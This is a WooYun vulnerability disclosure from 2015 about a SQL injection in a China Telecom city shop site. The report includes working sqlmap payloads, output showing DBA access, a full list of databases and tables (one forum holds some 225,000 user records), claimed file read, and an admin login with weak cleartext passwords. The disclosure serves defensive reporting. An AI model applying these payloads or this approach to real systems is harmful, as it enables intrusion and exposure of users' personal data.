当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144355

漏洞标题:某市电信商城某处SQL未修复完可继续注入(DBA权限+十几万用户信息泄漏+弱密码可入后台)

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2015-10-01 09:30

修复时间:2015-11-24 16:56

公开时间:2015-11-24 16:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-01: 细节已通知厂商并且等待厂商处理中
2015-10-10: 厂商已经确认,细节仅向厂商公开
2015-10-20: 细节向核心白帽子及相关领域专家公开
2015-10-30: 细节向普通白帽子公开
2015-11-09: 细节向实习白帽子公开
2015-11-24: 细节向公众公开

简要描述:

抓包发现一个注入点,搜索已经有提交过,但是没有修复好,依旧可以注入,且弱口令存在很多,而且部分数据库明文!其余的注入点测试已经没有了?还是不知道方法或者没有搜到?

详细说明:

抓包得到注入点

http://**.**.**.**/ajax_check_user.php?email=x
测试
http://**.**.**.**/ajax_check_user.php?email=x'
返回信息
select userid from userinfo where useremail='x'' limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''x'' limit 1' at line 1


判断存在注入

0.jpg


然后上sqlmap测试,发现
未添加--level 3测试结果为:

1.jpg


添加--level 3 测试结果为:

2.jpg


查看权限为DBA权限,可以干很多事情吧!~~~

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: email
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
    Payload: email=x%' RLIKE (SELECT (CASE WHEN (2009=2009) THEN 0x78 ELSE 0x28
END)) AND '%'='
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: email=x%' AND (SELECT 8429 FROM(SELECT COUNT(*),CONCAT(0x7174686b71
,(SELECT (CASE WHEN (8429=8429) THEN 1 ELSE 0 END)),0x7174726271,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
[00:40:15] [INFO] testing MySQL
[00:40:15] [INFO] confirming MySQL
[00:40:15] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
[00:40:15] [INFO] fetching current user
[00:40:16] [WARNING] reflective value(s) found and filtering out
[00:40:16] [INFO] retrieved: root@localhost
current user:    'root@localhost'
[00:40:16] [INFO] fetching current database
[00:40:16] [INFO] retrieved: ego10000
current database:    'ego10000'
[00:40:16] [INFO] fetching server hostname
[00:40:17] [INFO] retrieved: **.**.**.**
hostname:    '**.**.**.**'
[00:40:17] [INFO] testing if current user is DBA
[00:40:17] [INFO] fetching current user
current user is DBA:    True
database management system users [9]:
[*] ''@'localhost'
[*] ''@'**.**.**.**'
[*] 'dspam'@'localhost'
[*] 'extmail'@'localhost'
[*] 'root'@'%'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'webman'@'localhost'
available databases [11]:
[*] dspam
[*] ego10000
[*] ego10000_bak
[*] extmail
[*] hallylure
[*] information_schema
[*] mysql
[*] shopstit
[*] stit_v3
[*] test
[*] ybzdb
Database: dspam
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| dspam_token_data     | 4649647 |		几百万数据信息,不知道是什么,没看了!~~~
| dspam_signature_data | 225707  |
| dspam_preferences    | 33      |
| dspam_stats          | 5       |
| dspam_virtual_uids   | 5       |
+----------------------+---------+
Database: ego10000
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| userinfo                          | 2938    |
| order_detail_info                 | 2302    |
| order_info                        | 2011    |
| goods_taocan_value                | 1365    |
| goods_taocan_attr                 | 1274    |
| search_log                        | 1212    |
| notice                            | 1148    |
| usercent                          | 1147    |
| gift_order                        | 1141    |
| attribute_value_info              | 1082    |
| goods_more_info                   | 960     |
| ask_goods_info                    | 689     |
| goods_image_info                  | 685     |
| telnumber                         | 566     |
| order_network                     | 430     |
| goods_mutuality_info              | 371     |
| shop_basket                       | 343     |
| goods_info                        | 270     |
| goods_taocan                      | 147     |
| activityinfo                      | 95      |
| tel_number                        | 77      |
| rcmdgoods                         | 73      |
| create_html                       | 68      |
| adminmenu                         | 67      |
| news                              | 55      |
| class_info                        | 45      |
| gp_class                          | 45      |
| tel_type_template_attr            | 39      |
| attribute_class_select_value_info | 36      |
| act_user_award_info               | 35      |
| repair                            | 30      |
| tel_taocan_value                  | 30      |
| ad_info                           | 22      |
| dispatch_pay_mutuality_info       | 16      |
| adminuser                         | 15      |
| dispatch_mode_info                | 13      |
| act_award_info                    | 11      |
| attribute_class_info              | 10      |
| tel_type                          | 8       |
| goods_fitting_mutuality_info      | 5       |
| tel_type_template                 | 5       |
| admingroup                        | 2       |
| gift_info                         | 2       |
+-----------------------------------+---------+
Database: extmail
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| mailbox        | 42      |
| alias          | 37      |
| `domain`       | 2       |
| domain_manager | 2       |
| manager        | 2       |
+----------------+---------+
Database: hallylure
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| hallylure_ucenter_memberfields          | 225937  |
| hallylure_ucenter_members               | 225937  |		二十多万用户
| hallylure_common_member_newprompt       | 225934  |
| hallylure_home_notification             | 215655  |
| hallylure_common_credit_rule_log        | 215248  |
| hallylure_common_member                 | 215104  |		同样也有二十多万用户
| hallylure_common_member_count           | 215104  |
| hallylure_common_member_field_forum     | 215104  |
| hallylure_common_member_field_home      | 215104  |
| hallylure_common_member_profile         | 215104  |
| hallylure_common_member_status          | 215104  |
| hallylure_common_onlinetime             | 198587  |
| hallylure_common_district               | 45051   |
| hallylure_forum_statlog                 | 6930    |
| hallylure_security_failedlog            | 3953    |
| hallylure_forum_post                    | 2519    |
| hallylure_forum_filter_post             | 1159    |
| hallylure_forum_attachment              | 921     |
| hallylure_common_statuser               | 614     |
| hallylure_forum_threadpartake           | 606     |
| hallylure_common_stat                   | 533     |
| hallylure_forum_thread                  | 491     |
| hallylure_forum_post_tableid            | 486     |
| hallylure_common_setting                | 433     |
| hallylure_forum_sofa                    | 356     |
| hallylure_forum_threadhot               | 182     |
| hallylure_forum_attachment_0            | 134     |
| hallylure_forum_attachment_7            | 131     |
| hallylure_forum_attachment_8            | 124     |
| hallylure_common_syscache               | 108     |
| hallylure_forum_rsscache                | 106     |
| hallylure_forum_threadimage             | 106     |
| hallylure_common_block_style            | 103     |
| hallylure_forum_modwork                 | 101     |
| hallylure_forum_attachment_5            | 99      |
| hallylure_forum_attachment_9            | 98      |
| hallylure_forum_attachment_1            | 92      |
| hallylure_forum_threadcalendar          | 86      |
| hallylure_common_smiley                 | 85      |
| hallylure_forum_attachment_3            | 84      |
| hallylure_common_admincp_perm           | 67      |
| hallylure_ucenter_pm_indexes            | 63      |
| hallylure_forum_attachment_6            | 61      |
| hallylure_forum_attachment_2            | 59      |
| hallylure_common_nav                    | 52      |
| hallylure_common_member_profile_setting | 51      |
| hallylure_ucenter_pm_members            | 48      |
| hallylure_forum_forumfield              | 47      |
| hallylure_forum_forum                   | 46      |
| hallylure_common_stylevar               | 45      |
| hallylure_common_optimizer              | 34      |
| hallylure_connect_memberbindlog         | 33      |
| hallylure_forum_attachment_4            | 33      |
| hallylure_common_credit_rule            | 32      |
| hallylure_common_member_connect         | 29      |
| hallylure_ucenter_settings              | 26      |
| hallylure_ucenter_pm_lists              | 24      |
| hallylure_common_cron                   | 20      |
| hallylure_common_usergroup              | 20      |
| hallylure_common_usergroup_field        | 20      |
| hallylure_home_click                    | 15      |
| hallylure_common_failedlogin            | 14      |
| hallylure_common_connect_guest          | 13      |
| hallylure_common_plugin                 | 12      |
| hallylure_forum_threadmod               | 12      |
| hallylure_forum_medal                   | 10      |
| hallylure_ucenter_notelist              | 9       |
| hallylure_ucenter_pm_messages_2         | 9       |
| hallylure_ucenter_pm_messages_9         | 9       |
| hallylure_ucenter_newpm                 | 8       |
| hallylure_common_admingroup             | 7       |
| hallylure_ucenter_pm_messages_3         | 7       |
| hallylure_ucenter_pm_messages_4         | 7       |
| hallylure_common_admincp_cmenu          | 6       |
| hallylure_forum_typeoption              | 6       |
| hallylure_ucenter_pm_messages_0         | 6       |
| hallylure_ucenter_pm_messages_7         | 6       |
| hallylure_common_admincp_group          | 5       |
| hallylure_common_friendlink             | 5       |
| hallylure_common_member_crime           | 5       |
| hallylure_ucenter_pm_messages_1         | 5       |
| hallylure_ucenter_pm_messages_6         | 5       |
| hallylure_ucenter_pm_messages_8         | 5       |
| hallylure_common_failedip               | 4       |
| hallylure_common_member_action_log      | 4       |
| hallylure_forum_attachment_unused       | 4       |
| hallylure_forum_bbcode                  | 4       |
| hallylure_forum_onlinelist              | 4       |
| hallylure_home_friend                   | 4       |
| hallylure_ucenter_pm_messages_5         | 4       |
| hallylure_forum_grouplevel              | 3       |
| hallylure_forum_imagetype               | 3       |
| hallylure_common_admincp_session        | 2       |
| hallylure_common_block                  | 2       |
| hallylure_common_cache                  | 2       |
| hallylure_common_template_block         | 2       |
| hallylure_common_word_type              | 2       |
| hallylure_forum_faq                     | 2       |
| hallylure_forum_hotreply_member         | 2       |
| hallylure_forum_hotreply_number         | 2       |
| hallylure_home_favorite                 | 2       |
| hallylure_home_friend_request           | 2       |
| hallylure_home_friendlog                | 2       |
| hallylure_mobile_setting                | 2       |
| hallylure_common_credit_rule_log_field  | 1       |
| hallylure_common_diy_data               | 1       |
| hallylure_common_searchindex            | 1       |
| hallylure_common_style                  | 1       |
| hallylure_common_template               | 1       |
| hallylure_forum_promotion               | 1       |
| hallylure_forum_threadprofile           | 1       |
| hallylure_forum_threadtype              | 1       |
| hallylure_home_visitor                  | 1       |
| hallylure_ucenter_admins                | 1       |
| hallylure_ucenter_applications          | 1       |
| hallylure_ucenter_failedlogins          | 1       |
+-----------------------------------------+---------+
Database: shopstit
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| attribute_value_info              | 18916   |
| shop_basket                       | 6900    |
| goods_image_info                  | 3742    |
| goods_info                        | 1993    |
| search_log                        | 1212    |
| notice                            | 1148    |
| userinfo                          | 830     |
| goods_mutuality_info              | 719     |
| ask_goods_info                    | 691     |
| order_detail_info                 | 665     |
| telnumber                         | 566     |
| rcmdgoods                         | 446     |
| order_info                        | 420     |
| news                              | 418     |
| attribute_class_select_value_info | 367     |
| gp_class                          | 359     |
| attribute_class_info              | 280     |
| class_info                        | 163     |
| goods_fav                         | 100     |
| activityinfo                      | 95      |
| usercent                          | 87      |
| adminmenu                         | 79      |
| create_html                       | 68      |
| sms                               | 63      |
| act_user_award_info               | 35      |
| repair                            | 30      |
| goods_fitting_mutuality_info      | 26      |
| dispatch_pay_mutuality_info       | 17      |
| dispatch_mode_info                | 13      |
| act_award_info                    | 10      |
| adminuser                         | 8       |
| admingroup                        | 5       |
+-----------------------------------+---------+
Database: stit_v3
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| goods_taocan_attr                 | 1303    |
| goods_taocan_value                | 1289    |
| search_log                        | 1212    |
| notice                            | 1148    |
| attribute_value_info              | 1091    |
| goods_more_info                   | 1072    |
| goods_image_info                  | 793     |
| ask_goods_info                    | 689     |
| tel_number                        | 670     |
| telnumber                         | 566     |
| goods_mutuality_info              | 407     |
| goods_info                        | 298     |
| userinfo                          | 280     |
| order_detail_info                 | 248     |
| gp_class                          | 214     |
| order_info                        | 195     |
| news                              | 158     |
| goods_taocan                      | 156     |
| tel_type_template_attr            | 121     |
| shop_basket                       | 114     |
| activityinfo                      | 95      |
| rcmdgoods                         | 94      |
| create_html                       | 68      |
| adminmenu                         | 64      |
| tel_taocan_value                  | 55      |
| class_info                        | 48      |
| act_user_award_info               | 35      |
| repair                            | 30      |
| attribute_class_select_value_info | 28      |
| goods_fitting_mutuality_info      | 22      |
| ad_info                           | 20      |
| order_network                     | 17      |
| tel_type_template                 | 14      |
| dispatch_pay_mutuality_info       | 13      |
| tel_type                          | 13      |
| dispatch_mode_info                | 12      |
| act_award_info                    | 11      |
| attribute_class_info              | 9       |
| adminuser                         | 5       |
| admingroup                        | 1       |
| gift_info                         | 1       |
+-----------------------------------+---------+
Database: ybzdb
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| v9_linkage          | 3284    |
| v9_menu             | 349     |
| v9_model_field      | 103     |
| v9_guestbook        | 43      |
| v9_hits             | 33      |
| v9_search           | 33      |
| v9_position_data    | 30      |
| v9_cache            | 29      |
| v9_news             | 29      |
| v9_news_data        | 29      |
| v9_admin_role_priv  | 28      |
| v9_module           | 27      |
| v9_category_priv    | 23      |
| v9_attachment       | 19      |
| v9_category         | 17      |
| v9_page             | 11      |
| v9_poster           | 10      |
| v9_poster_space     | 10      |
| v9_urlrule          | 8       |
| v9_admin_role       | 7       |
| v9_member_group     | 7       |
| v9_type             | 7       |
| v9_position         | 6       |
| v9_model            | 5       |
| v9_sso_settings     | 5       |
| v9_biaodan_data     | 4       |
| v9_picture          | 4       |
| v9_picture_data     | 4       |
| v9_workflow         | 4       |
| v9_admin_panel      | 3       |
| v9_member_menu      | 3       |
| v9_admin            | 2       |
| v9_announce         | 2       |
| v9_attachment_index | 2       |
| v9_link             | 2       |
| v9_comment_setting  | 1       |
| v9_comment_table    | 1       |
| v9_session          | 1       |
| v9_site             | 1       |
| v9_sso_admin        | 1       |
| v9_sso_applications | 1       |
| v9_wap              | 1       |
+---------------------+---------+
Database: mysql
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| help_relation | 993     |
| help_topic    | 508     |
| help_keyword  | 452     |
| help_category | 38      |
| `user`        | 9       |
| db            | 6       |
| func          | 5       |
| cgfuhc        | 2       |
| ehuyzk32      | 2       |
| ejfjxv32      | 2       |
| gjippi        | 2       |
| jtjqbr        | 2       |
| nciupb32      | 2       |
| omrnqa        | 2       |
| qpicbb        | 2       |
| ysqzut        | 2       |
| yttxfg32      | 2       |
| zcsxqm32      | 2       |
| zfdipw32      | 2       |
| abcgv         | 1       |
| abcgvmo       | 1       |
| tempEx        | 1       |
| tempExT1      | 1       |
+---------------+---------+


有些数据库的密码明文显示,无语了。其余的数据就不测试了,看看几十万,几百万就恐怖,就这样吧!~~~

3.jpg


可以读取任意文件

4.jpg


利用获取到的明文密码登录后台,还是弱口令,凌乱啊!~~~

5.jpg

漏洞证明:

3.jpg


4.jpg


5.jpg

修复方案:

过滤修复!
如果是舍弃的网站,赶紧关闭吧!~~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-10 16:55

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置.

最新状态:

暂无